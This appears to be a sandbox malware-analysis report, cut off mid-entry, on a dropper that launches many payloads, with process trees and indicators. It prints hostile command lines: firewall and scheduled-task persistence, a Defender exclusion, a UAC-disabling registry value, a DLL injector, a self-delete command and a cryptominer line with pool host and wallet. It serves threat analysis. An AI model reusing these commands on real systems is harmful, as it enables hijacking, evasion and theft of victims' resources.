4363463463464363463463463.bin.exedayroc.exed21cbe21e38b385a41a68c5e6dd32f4c.exema.execmd.exe.execmd.exepowershell.exed21cbe21e38b385a41a68c5e6dd32f4c.exedescription pid Process procid_target PID 3772 wrote to memory of 648 3772 4363463463464363463463463.bin.exe 74 PID 3772 wrote to memory of 648 3772 4363463463464363463463463.bin.exe 74 PID 3772 wrote to memory of 648 3772 4363463463464363463463463.bin.exe 74 PID 648 wrote to memory of 5068 648 dayroc.exe 75 PID 648 wrote to memory of 5068 648 dayroc.exe 75 PID 648 wrote to memory of 5068 648 dayroc.exe 75 PID 648 wrote to memory of 524 648 dayroc.exe 76 PID 648 wrote to memory of 524 648 dayroc.exe 76 PID 648 wrote to memory of 524 648 dayroc.exe 76 PID 648 wrote to memory of 3500 648 dayroc.exe 78 PID 648 wrote to memory of 3500 648 dayroc.exe 78 PID 648 wrote to memory of 3500 648 dayroc.exe 78 PID 3772 wrote to memory of 4160 3772 4363463463464363463463463.bin.exe 80 PID 3772 wrote to memory of 4160 3772 4363463463464363463463463.bin.exe 80 PID 3772 wrote to memory of 1468 3772 4363463463464363463463463.bin.exe 89 PID 3772 wrote to memory of 1468 3772 4363463463464363463463463.bin.exe 89 PID 3772 wrote to memory of 1468 3772 4363463463464363463463463.bin.exe 89 PID 524 wrote to memory of 2488 524 d21cbe21e38b385a41a68c5e6dd32f4c.exe 103 PID 524 wrote to memory of 2488 524 d21cbe21e38b385a41a68c5e6dd32f4c.exe 103 PID 524 wrote to memory of 2488 524 d21cbe21e38b385a41a68c5e6dd32f4c.exe 103 PID 3772 wrote to memory of 2636 3772 4363463463464363463463463.bin.exe 105 PID 3772 wrote to memory of 2636 3772 4363463463464363463463463.bin.exe 105 PID 3772 wrote to memory of 2636 3772 4363463463464363463463463.bin.exe 105 PID 3772 wrote to memory of 992 3772 4363463463464363463463463.bin.exe 107 PID 3772 wrote to memory of 992 3772 4363463463464363463463463.bin.exe 107 PID 992 wrote to memory of 424 992 ma.exe 108 PID 992 wrote to memory of 424 992 ma.exe 108 PID 424 wrote to memory of 2544 424 cmd.exe 110 PID 424 wrote to memory of 2544 424 cmd.exe 110 PID 424 wrote to memory of 4800 424 cmd.exe 111 PID 424 wrote to memory of 4800 424 cmd.exe 111 PID 4800 wrote to memory of 2484 4800 .exe 114 PID 4800 wrote to memory of 2484 4800 .exe 114 PID 2484 wrote to memory of 2372 2484 cmd.exe 113 PID 2484 wrote to memory of 2372 2484 cmd.exe 113 PID 3772 wrote to memory of 3516 3772 4363463463464363463463463.bin.exe 118 PID 3772 wrote to memory of 3516 3772 4363463463464363463463463.bin.exe 118 PID 3772 wrote to memory of 3516 3772 4363463463464363463463463.bin.exe 118 PID 2132 wrote to memory of 2640 2132 powershell.exe 123 PID 2132 wrote to memory of 2640 2132 powershell.exe 123 PID 2132 wrote to memory of 2640 2132 powershell.exe 123 PID 2784 wrote to memory of 2360 2784 d21cbe21e38b385a41a68c5e6dd32f4c.exe 131 PID 2784 wrote to memory of 2360 2784 d21cbe21e38b385a41a68c5e6dd32f4c.exe 131 PID 2784 wrote to memory of 2360 2784 d21cbe21e38b385a41a68c5e6dd32f4c.exe 131 PID 3772 wrote to memory of 4696 3772 4363463463464363463463463.bin.exe 213 PID 3772 wrote to memory of 4696 3772 4363463463464363463463463.bin.exe 213 PID 4800 wrote to memory of 2392 4800 .exe 134 PID 4800 wrote to memory of 2392 4800 .exe 134 PID 4800 wrote to memory of 2392 4800 .exe 134 PID 4800 wrote to memory of 2392 4800 .exe 134 PID 4800 wrote to memory of 2392 4800 .exe 134 PID 4800 wrote to memory of 2392 4800 .exe 134 PID 4800 wrote to memory of 2392 4800 .exe 134 PID 3772 wrote to memory of 4288 3772 4363463463464363463463463.bin.exe 296 PID 3772 wrote to memory of 4288 3772 4363463463464363463463463.bin.exe 296 PID 3772 wrote to memory of 4288 3772 4363463463464363463463463.bin.exe 296 PID 3772 wrote to memory of 4812 3772 4363463463464363463463463.bin.exe 137 PID 3772 wrote to memory of 4812 3772 4363463463464363463463463.bin.exe 137 PID 3772 wrote to memory of 4812 3772 4363463463464363463463463.bin.exe 137 PID 3772 wrote to memory of 664 3772 4363463463464363463463463.bin.exe 138 PID 3772 wrote to memory of 664 3772 4363463463464363463463463.bin.exe 138 PID 3772 wrote to memory of 664 3772 4363463463464363463463463.bin.exe 138 PID 3772 wrote to memory of 2124 3772 4363463463464363463463463.bin.exe 139 PID 3772 wrote to memory of 2124 3772 4363463463464363463463463.bin.exe 139 -
System policy modification 1 TTPs 1 IoCs
Processes:
File300un.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" File300un.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 1 IoCs
-
outlook_office_path 1 IoCs
Processes:
openwith.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook openwith.exe -
outlook_win_path 1 IoCs
Processes:
openwith.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-3063448957-1373478339-3486599166-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook openwith.exe
Processes
-
c:\windows\system32\sihost.exesihost.exe1⤵PID:2936
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵PID:5720
-
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵PID:7088
-
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:7412
-
-
C:\Windows\system32\openwith.exe"C:\Windows\system32\openwith.exe"2⤵
- Accesses Microsoft Outlook profiles
- Suspicious use of SetThreadContext
- Checks processor information in registry
- outlook_office_path
- outlook_win_path
PID:6620 -
C:\Program Files\Windows Media Player\wmpnscfg.exe"C:\Program Files\Windows Media Player\wmpnscfg.exe"3⤵PID:9328
-
-
C:\Program Files\Windows Media Player\wmlaunch.exe"C:\Program Files\Windows Media Player\wmlaunch.exe"3⤵PID:9724
-
-
C:\Program Files\Windows Media Player\wmplayer.exe"C:\Program Files\Windows Media Player\wmplayer.exe"3⤵PID:10108
-
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3800
-
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.bin.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.bin.exe"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3772 -
C:\Users\Admin\AppData\Local\Temp\Files\dayroc.exe"C:\Users\Admin\AppData\Local\Temp\Files\dayroc.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:648 -
C:\Users\Admin\AppData\Local\Temp\nine.exe"C:\Users\Admin\AppData\Local\Temp\nine.exe"3⤵
- Executes dropped EXE
PID:5068 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 4964⤵
- Program crash
PID:924
-
-
-
C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe"C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:524 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 524 -s 3844⤵
- Program crash
PID:4188
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 524 -s 3644⤵
- Program crash
PID:4896
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 524 -s 4004⤵
- Program crash
PID:2620
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 524 -s 6204⤵
- Program crash
PID:628
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 524 -s 6564⤵
- Program crash
PID:1812
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 524 -s 6924⤵
- Program crash
PID:2572
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 524 -s 7204⤵
- Program crash
PID:4584
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 524 -s 7684⤵
- Program crash
PID:1208
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 524 -s 6204⤵
- Program crash
PID:2004
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 524 -s 6804⤵
- Program crash
PID:3776
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 524 -s 6804⤵
- Program crash
PID:3676
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 524 -s 6964⤵
- Program crash
PID:1960
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 524 -s 8124⤵
- Program crash
PID:1520
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 524 -s 5804⤵
- Program crash
PID:2204
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 524 -s 8444⤵
- Program crash
PID:1192
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 524 -s 6804⤵
- Program crash
PID:3980
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 524 -s 5924⤵
- Program crash
PID:1732
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 524 -s 7044⤵
- Program crash
PID:4468
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 524 -s 8044⤵
- Program crash
PID:4652
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2488
-
-
C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe"C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe"4⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2784 -s 3605⤵
- Program crash
PID:2368
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2784 -s 4165⤵
- Program crash
PID:2164
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2784 -s 3765⤵
- Program crash
PID:1460
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2784 -s 5925⤵
- Program crash
PID:2868
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2784 -s 6285⤵
- Program crash
PID:208
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2784 -s 6805⤵
- Program crash
PID:4636
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2784 -s 6325⤵
- Program crash
PID:3632
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2784 -s 6365⤵
- Program crash
PID:2660
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2784 -s 7725⤵
- Program crash
PID:1116
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2360
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:4696
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
PID:4584
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2132
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1648
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
PID:2172 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2172 -s 3846⤵
- Program crash
PID:1132
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2172 -s 3926⤵
- Program crash
PID:4680
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2172 -s 4086⤵
- Program crash
PID:2960
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2172 -s 3726⤵
- Program crash
PID:4272
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2172 -s 6926⤵
- Program crash
PID:1132
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2172 -s 7726⤵
- Program crash
PID:1460
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2172 -s 6966⤵
- Program crash
PID:4532
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2172 -s 7806⤵
- Program crash
PID:4792
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2172 -s 9086⤵
- Program crash
PID:5072
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2244
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:5252
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵PID:5124
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1164
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2172 -s 6806⤵
- Program crash
PID:1516
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2172 -s 9526⤵
- Program crash
PID:5944
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3532
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2172 -s 9926⤵
- Program crash
PID:2196
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵PID:6360
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:5152
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:10480
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\toolspub1.exe"C:\Users\Admin\AppData\Local\Temp\toolspub1.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3500
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\app1.exe"C:\Users\Admin\AppData\Local\Temp\Files\app1.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4160
-
-
C:\Users\Admin\AppData\Local\Temp\Files\6.exe"C:\Users\Admin\AppData\Local\Temp\Files\6.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1468
-
-
C:\Users\Admin\AppData\Local\Temp\Files\StealerClient_Sharp_1_4.exe"C:\Users\Admin\AppData\Local\Temp\Files\StealerClient_Sharp_1_4.exe"2⤵
- Executes dropped EXE
PID:2636 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2636 -s 8283⤵
- Program crash
PID:4676
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:992 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp9599.tmp.bat""3⤵
- Suspicious use of WriteProcessMemory
PID:424 -
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
PID:2544
-
-
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4800 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:2484
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl5⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2392
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\7e207560.exe"C:\Users\Admin\AppData\Local\Temp\Files\7e207560.exe"2⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
PID:3516
-
-
C:\Users\Admin\AppData\Local\Temp\Files\asas.exe"C:\Users\Admin\AppData\Local\Temp\Files\asas.exe"2⤵PID:4696
-
C:\Windows\System32\werfault.exe\??\C:\Windows\System32\werfault.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1960
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\cs_maltest.exe"C:\Users\Admin\AppData\Local\Temp\Files\cs_maltest.exe"2⤵PID:4288
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe"C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4812 -
C:\Users\Admin\AppData\Local\Temp\BBLb.exe"C:\Users\Admin\AppData\Local\Temp\BBLb.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4696 -
C:\Users\Admin\AppData\Local\Temp\BBLb.exeC:\Users\Admin\AppData\Local\Temp\BBLb.exe4⤵PID:5276
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exeC:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe3⤵
- Executes dropped EXE
PID:5564
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exeC:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:5524 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5524 -s 5164⤵
- Program crash
PID:3304
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5524 -s 4964⤵
- Program crash
PID:4444
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\File300un.exe"C:\Users\Admin\AppData\Local\Temp\Files\File300un.exe"2⤵
- UAC bypass
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- System policy modification
PID:664 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Files\File300un.exe" -Force3⤵
- Suspicious use of AdjustPrivilegeToken
PID:628
-
-
C:\Windows\SYSWOW64\calc.exe"C:\Windows\SYSWOW64\calc.exe"3⤵PID:2856
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\sc.exe"C:\Users\Admin\AppData\Local\Temp\Files\sc.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Launches sc.exe
PID:2124
-
-
C:\Users\Admin\AppData\Local\Temp\Files\a5d66a7d45ad000c9925a7cc663df2a8944fcd5cf8de64533ea36f545599ca39.exe"C:\Users\Admin\AppData\Local\Temp\Files\a5d66a7d45ad000c9925a7cc663df2a8944fcd5cf8de64533ea36f545599ca39.exe"2⤵
- Executes dropped EXE
PID:4840 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4840 -s 8203⤵
- Program crash
PID:4684
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4840 -s 8363⤵
- Program crash
PID:488
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4840 -s 8763⤵
- Program crash
PID:4288
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4840 -s 8523⤵
- Program crash
PID:2244
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4840 -s 8603⤵
- Program crash
PID:2480
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4840 -s 9363⤵
- Program crash
PID:1400
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4840 -s 9163⤵
- Program crash
PID:4340
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "a5d66a7d45ad000c9925a7cc663df2a8944fcd5cf8de64533ea36f545599ca39.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\Files\a5d66a7d45ad000c9925a7cc663df2a8944fcd5cf8de64533ea36f545599ca39.exe" & exit3⤵PID:3780
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "a5d66a7d45ad000c9925a7cc663df2a8944fcd5cf8de64533ea36f545599ca39.exe" /f4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:744
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\1.exe"C:\Users\Admin\AppData\Local\Temp\Files\1.exe"2⤵
- Executes dropped EXE
PID:516
-
-
C:\Users\Admin\AppData\Local\Temp\Files\installer.exe"C:\Users\Admin\AppData\Local\Temp\Files\installer.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4388 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2292
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\june.exe"C:\Users\Admin\AppData\Local\Temp\Files\june.exe"2⤵
- Executes dropped EXE
PID:3492 -
C:\Users\Admin\AppData\Local\Temp\is-L5SCJ.tmp\june.tmp"C:\Users\Admin\AppData\Local\Temp\is-L5SCJ.tmp\june.tmp" /SL5="$402DC,5927631,54272,C:\Users\Admin\AppData\Local\Temp\Files\june.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:4556
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"2⤵PID:2176
-
-
C:\Users\Admin\AppData\Local\Temp\Files\for.exe"C:\Users\Admin\AppData\Local\Temp\Files\for.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:876 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:512
-
C:\Users\Admin\AppData\Roaming\configurationValue\bott.exe"C:\Users\Admin\AppData\Roaming\configurationValue\bott.exe"4⤵
- Executes dropped EXE
PID:32
-
-
C:\Users\Admin\AppData\Roaming\configurationValue\STAR.exe"C:\Users\Admin\AppData\Roaming\configurationValue\STAR.exe"4⤵
- Drops startup file
- Executes dropped EXE
PID:2676 -
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe"5⤵
- Executes dropped EXE
PID:652
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"4⤵PID:5780
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 35⤵PID:5452
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe"C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4028 -
C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exeC:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:6216
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\beacon_certutil.exe"C:\Users\Admin\AppData\Local\Temp\Files\beacon_certutil.exe"2⤵
- Executes dropped EXE
PID:4776
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe"C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe"2⤵
- Executes dropped EXE
PID:356
-
-
C:\Users\Admin\AppData\Local\Temp\Files\tempate.exe"C:\Users\Admin\AppData\Local\Temp\Files\tempate.exe"2⤵PID:1600
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe3⤵PID:5508
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe3⤵PID:5536
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe3⤵PID:5516
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\syncUpd.exe"C:\Users\Admin\AppData\Local\Temp\Files\syncUpd.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:5996
-
-
C:\Users\Admin\AppData\Local\Temp\Files\niks.exe"C:\Users\Admin\AppData\Local\Temp\Files\niks.exe"2⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2888
-
-
C:\Users\Admin\AppData\Local\Temp\Files\amert.exe"C:\Users\Admin\AppData\Local\Temp\Files\amert.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
